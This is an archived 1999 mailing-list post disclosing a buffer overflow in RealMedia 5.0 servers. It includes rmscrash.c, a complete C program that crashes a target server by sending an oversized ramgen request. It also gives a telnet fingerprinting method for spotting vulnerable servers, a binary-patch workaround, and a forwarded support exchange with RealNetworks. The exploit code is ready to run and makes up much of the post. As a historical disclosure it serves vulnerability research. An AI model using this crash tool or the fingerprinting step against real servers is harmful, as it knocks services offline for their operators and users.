RealMedia 5.0 servers, and probably 4.0, can be crashed by overflowing the buffer which stores the ramgen requests. I emailed RealNetworks about it and they finally got back to me a month and a half later. Their response was that it's a known issue with 5.0 and the only way to fix it is to upgrade to 6.0.. Of course upgrading means paying more money. I really wish all companies would fully back their COMMERCIAL software and make patches for previous releases. Oh well. The exploit is included below. It's been tested on FreeBSD and RealMedia server 5.0-rvserver-build-290. When the server crashes, it logs the IP of the person who crashed it in the pnserver error log. It looks like this: ***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Attempting Crash Avoidance... ***22-Dec-99 10:57:16.112 pnserver(241): Fault caused by type 0 client from 204.216.183.2 ***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Crash Avoidance Successful ***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Couldn't Handle Fault: Terminating... ***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Please File Bug Report An easy way to tell if a server is running 5.0 is to telnet to the realmedia port, usually 7070, and typing: GET /SmpDsBhgRl <enter><enter> >From what i've seen, RealMedia 5.0 servers always returns "Server: RealServer 1.0 Beta" in the headers, and G2 (6.0, and 7.0?) servers return "Server: RMServer 1.0". A hacked up fix for the problem that I've used is to edit the pnserver binary and change the ramgen string to something else. This, however, will break the ramgen functionality. (Which i dont use). If you are going to rename the ramgen in the binary to something else, make sure it matches the string length of 6. -bow -- START OF RMSCRASH.C -- /* * rmscrash.c - bowat_private * * Crash a RealMedia 5.0 server by sending a very long ramgen request. * * Test on: * $ pnserver -v * Version: 5.0-rvserver-build-290 * Platform: FreeBSD-2.1.x * */ #include <stdio.h> #include <stdlib.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #define BUFLEN 4082 char buf[BUFLEN+14]; int sock; struct sockaddr_in sa; struct hostent *hp; void main (int argc, char *argv[]) { int i, port; if (argc < 3) { printf("Usage: %s realserver port\n",argv[0]); exit(-1); } port = atoi(argv[2]); memset(buf,0x41,BUFLEN); memcpy(buf,"GET /ramgen/",12); memcpy(buf+BUFLEN," HTTP/1.1\r\n\r\n", 13); if ((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) { perror("gethostbyname()"); exit(0); } if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { perror("socket()"); exit(0); } sa.sin_family=AF_INET; sa.sin_port=htons(port); memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length); if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) { perror("connect()"); exit(0); } printf("Connected to %s. Sending data\n",argv[1]); write(sock,buf,strlen(buf)); printf("Done.\n"); close(sock); exit(0); } --- END OF RMSCRASH.C --- ----- Forwarded message from tsserverat_private ----- From: tsserverat_private Date: Wed, 22 Dec 1999 10:14:57 -0800 Subject: Re: max the ramgen buffer [#7570768] To: bowat_private X-MIME-Autoconverted: from quoted-printable to 8bit by bow.net id KAA03016 Hello Bow, No, unfortunately there is not. The solution is to upgrade to 6.0 or 7.0. Best wishes, Kim ~~~~~~~~~~~~~~~~~~~~ Kimberly Ayars SDK Support Engineer ------- Original Message -------- >From: bowat_private >To: tsserverat_private >Subject: Re: max the ramgen buffer [#7570768] >Date: 12/21/99 16:58:20 > > >Well is there a fix for this in the 5.0 server?? > >-bow > >On Tue, Dec 21, 1999 at 04:52:07PM -0800, tsserverat_private wrote: >> Hello Bow, >> >> First of all, I apolgize for the delay in responding. Thank you so much for your patience. >> >> This is a known issue in the 5.0 RealServer and is fixed in the 6.0 and 7.0 RealServers. >> >> Best wishes, >> Kim >> ~~~~~~~~~~~~~~~~~~~~ >> Kimberly Ayars >> SDK Support Engineer >> ------- Original Message -------- >> >From: bowat_private >> >To: tsserverat_private >> >Subject: max the ramgen buffer >> >Date: 11/06/99 04:10:46 >> > >> > >> > Making a request to the Real5 server with a long (~4040 bytes) request will crash the server. Is this a known issue? >> > >> >***06-Nov-99 03:48:40.248 pnserver(60580): TRAPPED FAULT: Please File Bug Report >> >***06-Nov-99 03:48:40.248 pnserver(60580): Fault Report: >> >5.0-rvserver-build-290 >> >FreeBSD-2.1.x >> > >> > >> >Do you guys have an updated Real5 server? >> > >> > >> THE INFORMATION PROVIDED IN THE REALNETWORKS KNOWLEDGE BASE IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND. REALNETWORKS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL REALNETWORKS OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF REALNETWORKS OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. >> >> >> Copyright c RealNetworks Inc. and/or its licensors, 1995 - 1999 all rights reserved. RealAudio, RealVideo, RealMedia and RealPlayer are trademarks of RealNetworks Inc. >> >> >> --------------------- >> Instructions to Reply >> --------------------- >> >> >> Your Incident ID number for this request is 7570768 >> >> To reply to this message you may simply reply to this email. (Please do not modify the subject line) >> >> To view all activity on this ticket go to the following URL. You will also be able to reply from there. >> >> >> http://customerrelations.real.com/scripts/rnforms/loginpage.asp >> >> >> To verify your identity, you will be prompted for this Incident ID number and your email address. >> >> > > THE INFORMATION PROVIDED IN THE REALNETWORKS KNOWLEDGE BASE IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND. REALNETWORKS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL REALNETWORKS OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF REALNETWORKS OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. Copyright c RealNetworks Inc. and/or its licensors, 1995 - 1999 all rights reserved. RealAudio, RealVideo, RealMedia and RealPlayer are trademarks of RealNetworks Inc. --------------------- Instructions to Reply --------------------- Your Incident ID number for this request is 7570768 To reply to this message you may simply reply to this email. (Please do not modify the subject line) To view all activity on this ticket go to the following URL. You will also be able to reply from there. http://customerrelations.real.com/scripts/rnforms/loginpage.asp To verify your identity, you will be prompted for this Incident ID number and your email address. ----- End forwarded message -----
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:23:02 PDT